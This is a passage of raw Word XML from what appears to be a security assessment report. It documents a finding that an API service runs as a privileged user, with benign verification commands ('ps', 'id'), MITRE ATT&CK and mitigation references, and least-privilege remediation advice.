            <w:hyperlink r:id="Ra2c963ce31bb4835">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2BFD413C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>T1098</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6BE47ABD">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2BFD413C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Account Manipulation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="14E09FCB">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732386E"/>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18CB3CA" w:rsidP="0D325B6E" w:rsidRDefault="718CB3CA" w14:paraId="246E0CE1" w14:textId="5D65F9C1">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718CB3CA">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12F1A75" w:rsidP="0D325B6E" w:rsidRDefault="212F1A75" w14:paraId="1C946D69" w14:textId="25510244">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R355e9d3d269f4229">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="212F1A75">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M0926</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="034635A8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="212F1A75">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Privileged Account Management</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1A753414">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282B7DB" w14:textId="1531F6D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70D9550" w14:textId="4CFBF2D8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="199324F4" w14:textId="2C679276">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AAB7E19" w:rsidP="0D325B6E" w:rsidRDefault="2AAB7E19" w14:paraId="6EF04CA2" w14:textId="499A138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E19">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DD120BD" w:rsidP="0D325B6E" w:rsidRDefault="4DD120BD" w14:paraId="47CAFCB0" w14:textId="6CEE5DF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DD120BD">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4DD120BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4DD120BD">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is running as a privileged user, significantly </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4DD120BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>increas</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2F7E4D9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4DD120B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DD120BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the effectiveness of chain exploits. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F8CFB80">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running commands will end up running those commands as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F8CFB80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privileged</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F8CFB8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F8CFB80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F8CFB80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, giving them increased access and permissions to backend files and services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7E84B474" w14:textId="3B91ABB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AAB7E19" w:rsidP="0D325B6E" w:rsidRDefault="2AAB7E19" w14:paraId="2B92843A" w14:textId="1BCEFF8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E19">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5E55D9D" w:rsidP="0D325B6E" w:rsidRDefault="15E55D9D" w14:paraId="4ABC567C" w14:textId="333805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If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15E55D9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SERV</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="15E55D9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ICE</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="02405E8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2405E8A">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02405E8A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ervice</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10ED4182">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is exploited,</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a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B47F6E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B47F6E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attac</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B47F6E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B47F6E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">er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ll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m</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ed</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ia</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ely</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ave</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599D3987">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privileged</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a</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cc</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n</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5E55D9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the backend system. </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This misconfiguration significantly increases the criticality of any other vulnerability, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1F0FD762">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as it is</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 run</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4E7C42F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by</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E7C42F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an</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excessively </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privileged</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4DB5D3B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="00087FD3" w14:textId="1B3FCFD7">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AAB7E19" w:rsidP="0D325B6E" w:rsidRDefault="2AAB7E19" w14:paraId="13DFE7C9" w14:textId="6BE8B9D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E19">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2E930C1" w:rsidP="0D325B6E" w:rsidRDefault="02E930C1" w14:paraId="44C6CD96" w14:textId="2A296E8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E930C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Check what user is running the program by running “</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="68D237F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="68D237F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p XXX”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02E930C1" w:rsidP="0D325B6E" w:rsidRDefault="02E930C1" w14:paraId="23F84D21" w14:textId="12E3931F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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2E930C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Check the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67E79208">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67E79208">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02E930C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions by running “id user”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6E3F899D" w14:textId="6A7A4D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AAB7E19" w:rsidP="0D325B6E" w:rsidRDefault="2AAB7E19" w14:paraId="6BABC9F3" w14:textId="25A0A9B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E19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51D6A91D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7C9E1A8C" w:rsidP="0D325B6E" w:rsidRDefault="7C9E1A8C" w14:paraId="0AB48603" w14:textId="4BCD3A08">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9E1A8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C9E1A8C">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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="21144A1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="154A9B6E" w:rsidP="0D325B6E" w:rsidRDefault="154A9B6E" w14:paraId="683C4E98" w14:textId="1D92F095">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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54A9B6E">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D325B6E" w:rsidR="154A9B6E">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7C9E1A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Principle</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C9E1A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Least Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D14D6D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that non-privileged system accounts have only the minimum permissions required to function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="66C7851B" w:rsidP="0D325B6E" w:rsidRDefault="66C7851B" w14:paraId="6967C33A" w14:textId="6E220FF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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6C7851B">
        <w:rPr>
